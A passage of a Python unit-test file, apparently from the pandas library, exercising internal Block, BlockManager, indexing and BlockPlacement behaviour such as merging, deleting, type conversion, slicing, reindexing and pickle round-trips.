_check(self.oblock)
_check(self.bool_block)
def test_mgr_locs(self):
assert isinstance(self.fblock.mgr_locs, lib.BlockPlacement)
tm.assert_numpy_array_equal(self.fblock.mgr_locs.as_array,
np.array([0, 2, 4], dtype=np.int64))
def test_attrs(self):
assert self.fblock.shape == self.fblock.values.shape
assert self.fblock.dtype == self.fblock.values.dtype
assert len(self.fblock) == len(self.fblock.values)
def test_merge(self):
avals = randn(2, 10)
bvals = randn(2, 10)
ref_cols = Index(['e', 'a', 'b', 'd', 'f'])
ablock = make_block(avals, ref_cols.get_indexer(['e', 'b']))
bblock = make_block(bvals, ref_cols.get_indexer(['a', 'd']))
merged = ablock.merge(bblock)
tm.assert_numpy_array_equal(merged.mgr_locs.as_array,
np.array([0, 1, 2, 3], dtype=np.int64))
tm.assert_numpy_array_equal(merged.values[[0, 2]], np.array(avals))
tm.assert_numpy_array_equal(merged.values[[1, 3]], np.array(bvals))
# TODO: merge with mixed type?
def test_copy(self):
cop = self.fblock.copy()
assert cop is not self.fblock
assert_block_equal(self.fblock, cop)
def test_reindex_index(self):
pass
def test_reindex_cast(self):
pass
def test_insert(self):
pass
def test_delete(self):
newb = self.fblock.copy()
newb.delete(0)
assert isinstance(newb.mgr_locs, lib.BlockPlacement)
tm.assert_numpy_array_equal(newb.mgr_locs.as_array,
np.array([2, 4], dtype=np.int64))
assert (newb.values[0] == 1).all()
newb = self.fblock.copy()
newb.delete(1)
assert isinstance(newb.mgr_locs, lib.BlockPlacement)
tm.assert_numpy_array_equal(newb.mgr_locs.as_array,
np.array([0, 4], dtype=np.int64))
assert (newb.values[1] == 2).all()
newb = self.fblock.copy()
newb.delete(2)
tm.assert_numpy_array_equal(newb.mgr_locs.as_array,
np.array([0, 2], dtype=np.int64))
assert (newb.values[1] == 1).all()
newb = self.fblock.copy()
with pytest.raises(Exception):
newb.delete(3)
def test_split_block_at(self):
# with dup column support this method was taken out
# GH3679
pytest.skip("skipping for now")
bs = list(self.fblock.split_block_at('a'))
assert len(bs) == 1
assert np.array_equal(bs[0].items, ['c', 'e'])
bs = list(self.fblock.split_block_at('c'))
assert len(bs) == 2
assert np.array_equal(bs[0].items, ['a'])
assert np.array_equal(bs[1].items, ['e'])
bs = list(self.fblock.split_block_at('e'))
assert len(bs) == 1
assert np.array_equal(bs[0].items, ['a', 'c'])
# bblock = get_bool_ex(['f'])
# bs = list(bblock.split_block_at('f'))
# assert len(bs), 0)
class TestDatetimeBlock(object):
def test_try_coerce_arg(self):
block = create_block('datetime', [0])
# coerce None
none_coerced = block._try_coerce_args(block.values, None)[2]
assert pd.Timestamp(none_coerced) is pd.NaT
# coerce different types of date bojects
vals = (np.datetime64('2010-10-10'), datetime(2010, 10, 10),
date(2010, 10, 10))
for val in vals:
coerced = block._try_coerce_args(block.values, val)[2]
assert np.int64 == type(coerced)
assert pd.Timestamp('2010-10-10') == pd.Timestamp(coerced)
class TestBlockManager(object):
def test_constructor_corner(self):
pass
def test_attrs(self):
mgr = create_mgr('a,b,c: f8-1; d,e,f: f8-2')
assert mgr.nblocks == 2
assert len(mgr) == 6
def test_is_mixed_dtype(self):
assert not create_mgr('a,b:f8').is_mixed_type
assert not create_mgr('a:f8-1; b:f8-2').is_mixed_type
assert create_mgr('a,b:f8; c,d: f4').is_mixed_type
assert create_mgr('a,b:f8; c,d: object').is_mixed_type
def test_is_indexed_like(self):
mgr1 = create_mgr('a,b: f8')
mgr2 = create_mgr('a:i8; b:bool')
mgr3 = create_mgr('a,b,c: f8')
assert mgr1._is_indexed_like(mgr1)
assert mgr1._is_indexed_like(mgr2)
assert mgr1._is_indexed_like(mgr3)
assert not mgr1._is_indexed_like(mgr1.get_slice(
slice(-1), axis=1))
def test_duplicate_ref_loc_failure(self):
tmp_mgr = create_mgr('a:bool; a: f8')
axes, blocks = tmp_mgr.axes, tmp_mgr.blocks
blocks[0].mgr_locs = np.array([0])
blocks[1].mgr_locs = np.array([0])
# test trying to create block manager with overlapping ref locs
with pytest.raises(AssertionError):
BlockManager(blocks, axes)
blocks[0].mgr_locs = np.array([0])
blocks[1].mgr_locs = np.array([1])
mgr = BlockManager(blocks, axes)
mgr.iget(1)
def test_contains(self, mgr):
assert 'a' in mgr
assert 'baz' not in mgr
def test_pickle(self, mgr):
mgr2 = tm.round_trip_pickle(mgr)
assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))
# share ref_items
# assert mgr2.blocks[0].ref_items is mgr2.blocks[1].ref_items
# GH2431
assert hasattr(mgr2, "_is_consolidated")
assert hasattr(mgr2, "_known_consolidated")
# reset to False on load
assert not mgr2._is_consolidated
assert not mgr2._known_consolidated
def test_non_unique_pickle(self):
mgr = create_mgr('a,a,a:f8')
mgr2 = tm.round_trip_pickle(mgr)
assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))
mgr = create_mgr('a: f8; a: i8')
mgr2 = tm.round_trip_pickle(mgr)
assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))
def test_categorical_block_pickle(self):
mgr = create_mgr('a: category')
mgr2 = tm.round_trip_pickle(mgr)
assert_frame_equal(DataFrame(mgr), DataFrame(mgr2))
smgr = create_single_mgr('category')
smgr2 = tm.round_trip_pickle(smgr)
assert_series_equal(Series(smgr), Series(smgr2))
def test_get_scalar(self, mgr):
for item in mgr.items:
for i, index in enumerate(mgr.axes[1]):
res = mgr.get_scalar((item, index))
exp = mgr.get(item, fastpath=False)[i]
assert res == exp
exp = mgr.get(item).internal_values()[i]
assert res == exp
def test_get(self):
cols = Index(list('abc'))
values = np.random.rand(3, 3)
block = make_block(values=values.copy(), placement=np.arange(3))
mgr = BlockManager(blocks=[block], axes=[cols, np.arange(3)])
assert_almost_equal(mgr.get('a', fastpath=False), values[0])
assert_almost_equal(mgr.get('b', fastpath=False), values[1])
assert_almost_equal(mgr.get('c', fastpath=False), values[2])
assert_almost_equal(mgr.get('a').internal_values(), values[0])
assert_almost_equal(mgr.get('b').internal_values(), values[1])
assert_almost_equal(mgr.get('c').internal_values(), values[2])
def test_set(self):
mgr = create_mgr('a,b,c: int', item_shape=(3, ))
mgr.set('d', np.array(['foo'] * 3))
mgr.set('b', np.array(['bar'] * 3))
tm.assert_numpy_array_equal(mgr.get('a').internal_values(),
np.array([0] * 3))
tm.assert_numpy_array_equal(mgr.get('b').internal_values(),
np.array(['bar'] * 3, dtype=np.object_))
tm.assert_numpy_array_equal(mgr.get('c').internal_values(),
np.array([2] * 3))
tm.assert_numpy_array_equal(mgr.get('d').internal_values(),
np.array(['foo'] * 3, dtype=np.object_))
def test_set_change_dtype(self, mgr):
mgr.set('baz', np.zeros(N, dtype=bool))
mgr.set('baz', np.repeat('foo', N))
assert mgr.get('baz').dtype == np.object_
mgr2 = mgr.consolidate()
mgr2.set('baz', np.repeat('foo', N))
assert mgr2.get('baz').dtype == np.object_
mgr2.set('quux', randn(N).astype(int))
assert mgr2.get('quux').dtype == np.int_
mgr2.set('quux', randn(N))
assert mgr2.get('quux').dtype == np.float_
def test_set_change_dtype_slice(self): # GH8850
cols = MultiIndex.from_tuples([('1st', 'a'), ('2nd', 'b'), ('3rd', 'c')
])
df = DataFrame([[1.0, 2, 3], [4.0, 5, 6]], columns=cols)
df['2nd'] = df['2nd'] * 2.0
blocks = df._to_dict_of_blocks()
assert sorted(blocks.keys()) == ['float64', 'int64']
assert_frame_equal(blocks['float64'], DataFrame(
[[1.0, 4.0], [4.0, 10.0]], columns=cols[:2]))
assert_frame_equal(blocks['int64'], DataFrame(
[[3], [6]], columns=cols[2:]))
def test_copy(self, mgr):
cp = mgr.copy(deep=False)
for blk, cp_blk in zip(mgr.blocks, cp.blocks):
# view assertion
assert cp_blk.equals(blk)
assert cp_blk.values.base is blk.values.base
cp = mgr.copy(deep=True)
for blk, cp_blk in zip(mgr.blocks, cp.blocks):
# copy assertion we either have a None for a base or in case of
# some blocks it is an array (e.g. datetimetz), but was copied
assert cp_blk.equals(blk)
if cp_blk.values.base is not None and blk.values.base is not None:
assert cp_blk.values.base is not blk.values.base
else:
assert cp_blk.values.base is None and blk.values.base is None
def test_sparse(self):
mgr = create_mgr('a: sparse-1; b: sparse-2')
# what to test here?
assert mgr.as_matrix().dtype == np.float64
def test_sparse_mixed(self):
mgr = create_mgr('a: sparse-1; b: sparse-2; c: f8')
assert len(mgr.blocks) == 3
assert isinstance(mgr, BlockManager)
# what to test here?
def test_as_matrix_float(self):
mgr = create_mgr('c: f4; d: f2; e: f8')
assert mgr.as_matrix().dtype == np.float64
mgr = create_mgr('c: f4; d: f2')
assert mgr.as_matrix().dtype == np.float32
def test_as_matrix_int_bool(self):
mgr = create_mgr('a: bool-1; b: bool-2')
assert mgr.as_matrix().dtype == np.bool_
mgr = create_mgr('a: i8-1; b: i8-2; c: i4; d: i2; e: u1')
assert mgr.as_matrix().dtype == np.int64
mgr = create_mgr('c: i4; d: i2; e: u1')
assert mgr.as_matrix().dtype == np.int32
def test_as_matrix_datetime(self):
mgr = create_mgr('h: datetime-1; g: datetime-2')
assert mgr.as_matrix().dtype == 'M8[ns]'
def test_as_matrix_datetime_tz(self):
mgr = create_mgr('h: M8[ns, US/Eastern]; g: M8[ns, CET]')
assert mgr.get('h').dtype == 'datetime64[ns, US/Eastern]'
assert mgr.get('g').dtype == 'datetime64[ns, CET]'
assert mgr.as_matrix().dtype == 'object'
def test_astype(self):
# coerce all
mgr = create_mgr('c: f4; d: f2; e: f8')
for t in ['float16', 'float32', 'float64', 'int32', 'int64']:
t = np.dtype(t)
tmgr = mgr.astype(t)
assert tmgr.get('c').dtype.type == t
assert tmgr.get('d').dtype.type == t
assert tmgr.get('e').dtype.type == t
# mixed
mgr = create_mgr('a,b: object; c: bool; d: datetime;'
'e: f4; f: f2; g: f8')
for t in ['float16', 'float32', 'float64', 'int32', 'int64']:
t = np.dtype(t)
tmgr = mgr.astype(t, errors='ignore')
assert tmgr.get('c').dtype.type == t
assert tmgr.get('e').dtype.type == t
assert tmgr.get('f').dtype.type == t
assert tmgr.get('g').dtype.type == t
assert tmgr.get('a').dtype.type == np.object_
assert tmgr.get('b').dtype.type == np.object_
if t != np.int64:
assert tmgr.get('d').dtype.type == np.datetime64
else:
assert tmgr.get('d').dtype.type == t
def test_convert(self):
def _compare(old_mgr, new_mgr):
""" compare the blocks, numeric compare ==, object don't """
old_blocks = set(old_mgr.blocks)
new_blocks = set(new_mgr.blocks)
assert len(old_blocks) == len(new_blocks)
# compare non-numeric
for b in old_blocks:
found = False
for nb in new_blocks:
if (b.values == nb.values).all():
found = True
break
assert found
for b in new_blocks:
found = False
for ob in old_blocks:
if (b.values == ob.values).all():
found = True
break
assert found
# noops
mgr = create_mgr('f: i8; g: f8')
new_mgr = mgr.convert()
_compare(mgr, new_mgr)
mgr = create_mgr('a, b: object; f: i8; g: f8')
new_mgr = mgr.convert()
_compare(mgr, new_mgr)
# convert
mgr = create_mgr('a,b,foo: object; f: i8; g: f8')
mgr.set('a', np.array(['1'] * N, dtype=np.object_))
mgr.set('b', np.array(['2.'] * N, dtype=np.object_))
mgr.set('foo', np.array(['foo.'] * N, dtype=np.object_))
new_mgr = mgr.convert(numeric=True)
assert new_mgr.get('a').dtype == np.int64
assert new_mgr.get('b').dtype == np.float64
assert new_mgr.get('foo').dtype == np.object_
assert new_mgr.get('f').dtype == np.int64
assert new_mgr.get('g').dtype == np.float64
mgr = create_mgr('a,b,foo: object; f: i4; bool: bool; dt: datetime;'
'i: i8; g: f8; h: f2')
mgr.set('a', np.array(['1'] * N, dtype=np.object_))
mgr.set('b', np.array(['2.'] * N, dtype=np.object_))
mgr.set('foo', np.array(['foo.'] * N, dtype=np.object_))
new_mgr = mgr.convert(numeric=True)
assert new_mgr.get('a').dtype == np.int64
assert new_mgr.get('b').dtype == np.float64
assert new_mgr.get('foo').dtype == np.object_
assert new_mgr.get('f').dtype == np.int32
assert new_mgr.get('bool').dtype == np.bool_
assert new_mgr.get('dt').dtype.type, np.datetime64
assert new_mgr.get('i').dtype == np.int64
assert new_mgr.get('g').dtype == np.float64
assert new_mgr.get('h').dtype == np.float16
def test_interleave(self):
# self
for dtype in ['f8', 'i8', 'object', 'bool', 'complex', 'M8[ns]',
'm8[ns]']:
mgr = create_mgr('a: {0}'.format(dtype))
assert mgr.as_matrix().dtype == dtype
mgr = create_mgr('a: {0}; b: {0}'.format(dtype))
assert mgr.as_matrix().dtype == dtype
# will be converted according the actual dtype of the underlying
mgr = create_mgr('a: category')
assert mgr.as_matrix().dtype == 'i8'
mgr = create_mgr('a: category; b: category')
assert mgr.as_matrix().dtype == 'i8'
mgr = create_mgr('a: category; b: category2')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: category2')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: category2; b: category2')
assert mgr.as_matrix().dtype == 'object'
# combinations
mgr = create_mgr('a: f8')
assert mgr.as_matrix().dtype == 'f8'
mgr = create_mgr('a: f8; b: i8')
assert mgr.as_matrix().dtype == 'f8'
mgr = create_mgr('a: f4; b: i8')
assert mgr.as_matrix().dtype == 'f8'
mgr = create_mgr('a: f4; b: i8; d: object')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: bool; b: i8')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: complex')
assert mgr.as_matrix().dtype == 'complex'
mgr = create_mgr('a: f8; b: category')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: M8[ns]; b: category')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: M8[ns]; b: bool')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: M8[ns]; b: i8')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: m8[ns]; b: bool')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: m8[ns]; b: i8')
assert mgr.as_matrix().dtype == 'object'
mgr = create_mgr('a: M8[ns]; b: m8[ns]')
assert mgr.as_matrix().dtype == 'object'
def test_interleave_non_unique_cols(self):
df = DataFrame([
[pd.Timestamp('20130101'), 3.5],
[pd.Timestamp('20130102'), 4.5]],
columns=['x', 'x'],
index=[1, 2])
df_unique = df.copy()
df_unique.columns = ['x', 'y']
assert df_unique.values.shape == df.values.shape
tm.assert_numpy_array_equal(df_unique.values[0], df.values[0])
tm.assert_numpy_array_equal(df_unique.values[1], df.values[1])
def test_consolidate(self):
pass
def test_consolidate_ordering_issues(self, mgr):
mgr.set('f', randn(N))
mgr.set('d', randn(N))
mgr.set('b', randn(N))
mgr.set('g', randn(N))
mgr.set('h', randn(N))
# we have datetime/tz blocks in mgr
cons = mgr.consolidate()
assert cons.nblocks == 4
cons = mgr.consolidate().get_numeric_data()
assert cons.nblocks == 1
assert isinstance(cons.blocks[0].mgr_locs, lib.BlockPlacement)
tm.assert_numpy_array_equal(cons.blocks[0].mgr_locs.as_array,
np.arange(len(cons.items), dtype=np.int64))
def test_reindex_index(self):
pass
def test_reindex_items(self):
# mgr is not consolidated, f8 & f8-2 blocks
mgr = create_mgr('a: f8; b: i8; c: f8; d: i8; e: f8;'
'f: bool; g: f8-2')
reindexed = mgr.reindex_axis(['g', 'c', 'a', 'd'], axis=0)
assert reindexed.nblocks == 2
tm.assert_index_equal(reindexed.items, pd.Index(['g', 'c', 'a', 'd']))
assert_almost_equal(
mgr.get('g', fastpath=False), reindexed.get('g', fastpath=False))
assert_almost_equal(
mgr.get('c', fastpath=False), reindexed.get('c', fastpath=False))
assert_almost_equal(
mgr.get('a', fastpath=False), reindexed.get('a', fastpath=False))
assert_almost_equal(
mgr.get('d', fastpath=False), reindexed.get('d', fastpath=False))
assert_almost_equal(
mgr.get('g').internal_values(),
reindexed.get('g').internal_values())
assert_almost_equal(
mgr.get('c').internal_values(),
reindexed.get('c').internal_values())
assert_almost_equal(
mgr.get('a').internal_values(),
reindexed.get('a').internal_values())
assert_almost_equal(
mgr.get('d').internal_values(),
reindexed.get('d').internal_values())
def test_multiindex_xs(self):
mgr = create_mgr('a,b,c: f8; d,e,f: i8')
index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'], ['one', 'two',
'three']],
labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],
[0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=['first', 'second'])
mgr.set_axis(1, index)
result = mgr.xs('bar', axis=1)
assert result.shape == (6, 2)
assert result.axes[1][0] == ('bar', 'one')
assert result.axes[1][1] == ('bar', 'two')
def test_get_numeric_data(self):
mgr = create_mgr('int: int; float: float; complex: complex;'
'str: object; bool: bool; obj: object; dt: datetime',
item_shape=(3, ))
mgr.set('obj', np.array([1, 2, 3], dtype=np.object_))
numeric = mgr.get_numeric_data()
tm.assert_index_equal(numeric.items,
pd.Index(['int', 'float', 'complex', 'bool']))
assert_almost_equal(
mgr.get('float', fastpath=False), numeric.get('float',
fastpath=False))
assert_almost_equal(
mgr.get('float').internal_values(),
numeric.get('float').internal_values())
# Check sharing
numeric.set('float', np.array([100., 200., 300.]))
assert_almost_equal(
mgr.get('float', fastpath=False), np.array([100., 200., 300.]))
assert_almost_equal(
mgr.get('float').internal_values(), np.array([100., 200., 300.]))
numeric2 = mgr.get_numeric_data(copy=True)
tm.assert_index_equal(numeric.items,
pd.Index(['int', 'float', 'complex', 'bool']))
numeric2.set('float', np.array([1000., 2000., 3000.]))
assert_almost_equal(
mgr.get('float', fastpath=False), np.array([100., 200., 300.]))
assert_almost_equal(
mgr.get('float').internal_values(), np.array([100., 200., 300.]))
def test_get_bool_data(self):
mgr = create_mgr('int: int; float: float; complex: complex;'
'str: object; bool: bool; obj: object; dt: datetime',
item_shape=(3, ))
mgr.set('obj', np.array([True, False, True], dtype=np.object_))
bools = mgr.get_bool_data()
tm.assert_index_equal(bools.items, pd.Index(['bool']))
assert_almost_equal(mgr.get('bool', fastpath=False),
bools.get('bool', fastpath=False))
assert_almost_equal(
mgr.get('bool').internal_values(),
bools.get('bool').internal_values())
bools.set('bool', np.array([True, False, True]))
tm.assert_numpy_array_equal(mgr.get('bool', fastpath=False),
np.array([True, False, True]))
tm.assert_numpy_array_equal(mgr.get('bool').internal_values(),
np.array([True, False, True]))
# Check sharing
bools2 = mgr.get_bool_data(copy=True)
bools2.set('bool', np.array([False, True, False]))
tm.assert_numpy_array_equal(mgr.get('bool', fastpath=False),
np.array([True, False, True]))
tm.assert_numpy_array_equal(mgr.get('bool').internal_values(),
np.array([True, False, True]))
def test_unicode_repr_doesnt_raise(self):
repr(create_mgr(u('b,\u05d0: object')))
def test_missing_unicode_key(self):
df = DataFrame({"a": [1]})
try:
df.loc[:, u("\u05d0")] # should not raise UnicodeEncodeError
except KeyError:
pass # this is the expected exception
def test_equals(self):
# unique items
bm1 = create_mgr('a,b,c: i8-1; d,e,f: i8-2')
bm2 = BlockManager(bm1.blocks[::-1], bm1.axes)
assert bm1.equals(bm2)
bm1 = create_mgr('a,a,a: i8-1; b,b,b: i8-2')
bm2 = BlockManager(bm1.blocks[::-1], bm1.axes)
assert bm1.equals(bm2)
def test_equals_block_order_different_dtypes(self):
# GH 9330
mgr_strings = [
"a:i8;b:f8", # basic case
"a:i8;b:f8;c:c8;d:b", # many types
"a:i8;e:dt;f:td;g:string", # more types
"a:i8;b:category;c:category2;d:category2", # categories
"c:sparse;d:sparse_na;b:f8", # sparse
]
for mgr_string in mgr_strings:
bm = create_mgr(mgr_string)
block_perms = itertools.permutations(bm.blocks)
for bm_perm in block_perms:
bm_this = BlockManager(bm_perm, bm.axes)
assert bm.equals(bm_this)
assert bm_this.equals(bm)
def test_single_mgr_ctor(self):
mgr = create_single_mgr('f8', num_rows=5)
assert mgr.as_matrix().tolist() == [0., 1., 2., 3., 4.]
def test_validate_bool_args(self):
invalid_values = [1, "True", [1, 2, 3], 5.0]
bm1 = create_mgr('a,b,c: i8-1; d,e,f: i8-2')
for value in invalid_values:
with pytest.raises(ValueError):
bm1.replace_list([1], [2], inplace=value)
class TestIndexing(object):
# Nosetests-style data-driven tests.
#
# This test applies different indexing routines to block managers and
# compares the outcome to the result of same operations on np.ndarray.
#
# NOTE: sparse (SparseBlock with fill_value != np.nan) fail a lot of tests
# and are disabled.
MANAGERS = [
create_single_mgr('f8', N),
create_single_mgr('i8', N),
# create_single_mgr('sparse', N),
create_single_mgr('sparse_na', N),
# 2-dim
create_mgr('a,b,c,d,e,f: f8', item_shape=(N,)),
create_mgr('a,b,c,d,e,f: i8', item_shape=(N,)),
create_mgr('a,b: f8; c,d: i8; e,f: string', item_shape=(N,)),
create_mgr('a,b: f8; c,d: i8; e,f: f8', item_shape=(N,)),
# create_mgr('a: sparse', item_shape=(N,)),
create_mgr('a: sparse_na', item_shape=(N,)),
# 3-dim
create_mgr('a,b,c,d,e,f: f8', item_shape=(N, N)),
create_mgr('a,b,c,d,e,f: i8', item_shape=(N, N)),
create_mgr('a,b: f8; c,d: i8; e,f: string', item_shape=(N, N)),
create_mgr('a,b: f8; c,d: i8; e,f: f8', item_shape=(N, N)),
# create_mgr('a: sparse', item_shape=(1, N)),
]
# MANAGERS = [MANAGERS[6]]
def test_get_slice(self):
def assert_slice_ok(mgr, axis, slobj):
# import pudb; pudb.set_trace()
mat = mgr.as_matrix()
# we maybe using an ndarray to test slicing and
# might not be the full length of the axis
if isinstance(slobj, np.ndarray):
ax = mgr.axes[axis]
if len(ax) and len(slobj) and len(slobj) != len(ax):
slobj = np.concatenate([slobj, np.zeros(
len(ax) - len(slobj), dtype=bool)])
sliced = mgr.get_slice(slobj, axis=axis)
mat_slobj = (slice(None), ) * axis + (slobj, )
tm.assert_numpy_array_equal(mat[mat_slobj], sliced.as_matrix(),
check_dtype=False)
tm.assert_index_equal(mgr.axes[axis][slobj], sliced.axes[axis])
for mgr in self.MANAGERS:
for ax in range(mgr.ndim):
# slice
assert_slice_ok(mgr, ax, slice(None))
assert_slice_ok(mgr, ax, slice(3))
assert_slice_ok(mgr, ax, slice(100))
assert_slice_ok(mgr, ax, slice(1, 4))
assert_slice_ok(mgr, ax, slice(3, 0, -2))
# boolean mask
assert_slice_ok(
mgr, ax, np.array([], dtype=np.bool_))
assert_slice_ok(
mgr, ax,
np.ones(mgr.shape[ax], dtype=np.bool_))
assert_slice_ok(
mgr, ax,
np.zeros(mgr.shape[ax], dtype=np.bool_))
if mgr.shape[ax] >= 3:
assert_slice_ok(
mgr, ax,
np.arange(mgr.shape[ax]) % 3 == 0)
assert_slice_ok(
mgr, ax, np.array(
[True, True, False], dtype=np.bool_))
# fancy indexer
assert_slice_ok(mgr, ax, [])
assert_slice_ok(mgr, ax, lrange(mgr.shape[ax]))
if mgr.shape[ax] >= 3:
assert_slice_ok(mgr, ax, [0, 1, 2])
assert_slice_ok(mgr, ax, [-1, -2, -3])
def test_take(self):
def assert_take_ok(mgr, axis, indexer):
mat = mgr.as_matrix()
taken = mgr.take(indexer, axis)
tm.assert_numpy_array_equal(np.take(mat, indexer, axis),
taken.as_matrix(), check_dtype=False)
tm.assert_index_equal(mgr.axes[axis].take(indexer),
taken.axes[axis])
for mgr in self.MANAGERS:
for ax in range(mgr.ndim):
# take/fancy indexer
assert_take_ok(mgr, ax, [])
assert_take_ok(mgr, ax, [0, 0, 0])
assert_take_ok(mgr, ax, lrange(mgr.shape[ax]))
if mgr.shape[ax] >= 3:
assert_take_ok(mgr, ax, [0, 1, 2])
assert_take_ok(mgr, ax, [-1, -2, -3])
def test_reindex_axis(self):
def assert_reindex_axis_is_ok(mgr, axis, new_labels, fill_value):
mat = mgr.as_matrix()
indexer = mgr.axes[axis].get_indexer_for(new_labels)
reindexed = mgr.reindex_axis(new_labels, axis,
fill_value=fill_value)
tm.assert_numpy_array_equal(algos.take_nd(mat, indexer, axis,
fill_value=fill_value),
reindexed.as_matrix(),
check_dtype=False)
tm.assert_index_equal(reindexed.axes[axis], new_labels)
for mgr in self.MANAGERS:
for ax in range(mgr.ndim):
for fill_value in (None, np.nan, 100.):
assert_reindex_axis_is_ok(
mgr, ax,
pd.Index([]), fill_value)
assert_reindex_axis_is_ok(
mgr, ax, mgr.axes[ax],
fill_value)
assert_reindex_axis_is_ok(
mgr, ax,
mgr.axes[ax][[0, 0, 0]], fill_value)
assert_reindex_axis_is_ok(
mgr, ax,
pd.Index(['foo', 'bar', 'baz']), fill_value)
assert_reindex_axis_is_ok(
mgr, ax,
pd.Index(['foo', mgr.axes[ax][0], 'baz']),
fill_value)
if mgr.shape[ax] >= 3:
assert_reindex_axis_is_ok(
mgr, ax,
mgr.axes[ax][:-3], fill_value)
assert_reindex_axis_is_ok(
mgr, ax,
mgr.axes[ax][-3::-1], fill_value)
assert_reindex_axis_is_ok(
mgr, ax,
mgr.axes[ax][[0, 1, 2, 0, 1, 2]], fill_value)
def test_reindex_indexer(self):
def assert_reindex_indexer_is_ok(mgr, axis, new_labels, indexer,
fill_value):
mat = mgr.as_matrix()
reindexed_mat = algos.take_nd(mat, indexer, axis,
fill_value=fill_value)
reindexed = mgr.reindex_indexer(new_labels, indexer, axis,
fill_value=fill_value)
tm.assert_numpy_array_equal(reindexed_mat,
reindexed.as_matrix(),
check_dtype=False)
tm.assert_index_equal(reindexed.axes[axis], new_labels)
for mgr in self.MANAGERS:
for ax in range(mgr.ndim):
for fill_value in (None, np.nan, 100.):
assert_reindex_indexer_is_ok(
mgr, ax,
pd.Index([]), [], fill_value)
assert_reindex_indexer_is_ok(
mgr, ax,
mgr.axes[ax], np.arange(mgr.shape[ax]), fill_value)
assert_reindex_indexer_is_ok(
mgr, ax,
pd.Index(['foo'] * mgr.shape[ax]),
np.arange(mgr.shape[ax]), fill_value)
assert_reindex_indexer_is_ok(
mgr, ax,
mgr.axes[ax][::-1], np.arange(mgr.shape[ax]),
fill_value)
assert_reindex_indexer_is_ok(
mgr, ax, mgr.axes[ax],
np.arange(mgr.shape[ax])[::-1], fill_value)
assert_reindex_indexer_is_ok(
mgr, ax,
pd.Index(['foo', 'bar', 'baz']),
[0, 0, 0], fill_value)
assert_reindex_indexer_is_ok(
mgr, ax,
pd.Index(['foo', 'bar', 'baz']),
[-1, 0, -1], fill_value)
assert_reindex_indexer_is_ok(
mgr, ax,
pd.Index(['foo', mgr.axes[ax][0], 'baz']),
[-1, -1, -1], fill_value)
if mgr.shape[ax] >= 3:
assert_reindex_indexer_is_ok(
mgr, ax,
pd.Index(['foo', 'bar', 'baz']),
[0, 1, 2], fill_value)
# test_get_slice(slice_like, axis)
# take(indexer, axis)
# reindex_axis(new_labels, axis)
# reindex_indexer(new_labels, indexer, axis)
class TestBlockPlacement(object):
def test_slice_len(self):
assert len(BlockPlacement(slice(0, 4))) == 4
assert len(BlockPlacement(slice(0, 4, 2))) == 2
assert len(BlockPlacement(slice(0, 3, 2))) == 2
assert len(BlockPlacement(slice(0, 1, 2))) == 1
assert len(BlockPlacement(slice(1, 0, -1))) == 1
def test_zero_step_raises(self):
with pytest.raises(ValueError):
BlockPlacement(slice(1, 1, 0))
with pytest.raises(ValueError):
BlockPlacement(slice(1, 2, 0))
def test_unbounded_slice_raises(self):
def assert_unbounded_slice_error(slc):
tm.assert_raises_regex(ValueError, "unbounded slice",
lambda: BlockPlacement(slc))
assert_unbounded_slice_error(slice(None, None))
assert_unbounded_slice_error(slice(10, None))
assert_unbounded_slice_error(slice(None, None, -1))
assert_unbounded_slice_error(slice(None, 10, -1))
# These are "unbounded" because negative index will change depending on
# container shape.
assert_unbounded_slice_error(slice(-1, None))
assert_unbounded_slice_error(slice(None, -1))
assert_unbounded_slice_error(slice(-1, -1))
assert_unbounded_slice_error(slice(-1, None, -1))
assert_unbounded_slice_error(slice(None, -1, -1))
assert_unbounded_slice_error(slice(-1, -1, -1))
def test_not_slice_like_slices(self):
def assert_not_slice_like(slc):
assert not BlockPlacement(slc).is_slice_like
assert_not_slice_like(slice(0, 0))
assert_not_slice_like(slice(100, 0))
assert_not_slice_like(slice(100, 100, -1))
assert_not_slice_like(slice(0, 100, -1))
assert not BlockPlacement(slice(0, 0)).is_slice_like
assert not BlockPlacement(slice(100, 100)).is_slice_like
def test_array_to_slice_conversion(self):
def assert_as_slice_equals(arr, slc):
assert BlockPlacement(arr).as_slice == slc
assert_as_slice_equals([0], slice(0, 1, 1))
assert_as_slice_equals([100], slice(100, 101, 1))
assert_as_slice_equals([0, 1, 2], slice(0, 3, 1))
assert_as_slice_equals([0, 5, 10], slice(0, 15, 5))
assert_as_slice_equals([0, 100], slice(0, 200, 100))
assert_as_slice_equals([2, 1], slice(2, 0, -1))
if not PY361:
assert_as_slice_equals([2, 1, 0], slice(2, None, -1))
assert_as_slice_equals([100, 0], slice(100, None, -100))
def test_not_slice_like_arrays(self):
def assert_not_slice_like(arr):
assert not BlockPlacement(arr).is_slice_like
assert_not_slice_like([])
assert_not_slice_like([-1])
assert_not_slice_like([-1, -2, -3])
assert_not_slice_like([-10])
assert_not_slice_like([-1])
assert_not_slice_like([-1, 0, 1, 2])
assert_not_slice_like([-2, 0, 2, 4])
assert_not_slice_like([1, 0, -1])
assert_not_slice_like([1, 1, 1])
def test_slice_iter(self):
assert list(BlockPlacement(slice(0, 3))) == [0, 1, 2]
assert list(BlockPlacement(slice(0, 0))) == []
assert list(BlockPlacement(slice(3, 0))) == []
if not PY361:
assert list(BlockPlacement(slice(3, 0, -1))) == [3, 2, 1]
assert list(BlockPlacement(slice(3, None, -1))) == [3, 2, 1, 0]
def test_slice_to_array_conversion(self):
def assert_as_array_equals(slc, asarray):
tm.assert_numpy_array_equal(
BlockPlacement(slc).as_array,
np.asarray(asarray, dtype=np.int64))
assert_as_array_equals(slice(0, 3), [0, 1, 2])
assert_as_array_equals(slice(0, 0), [])
assert_as_array_equals(slice(3, 0), [])
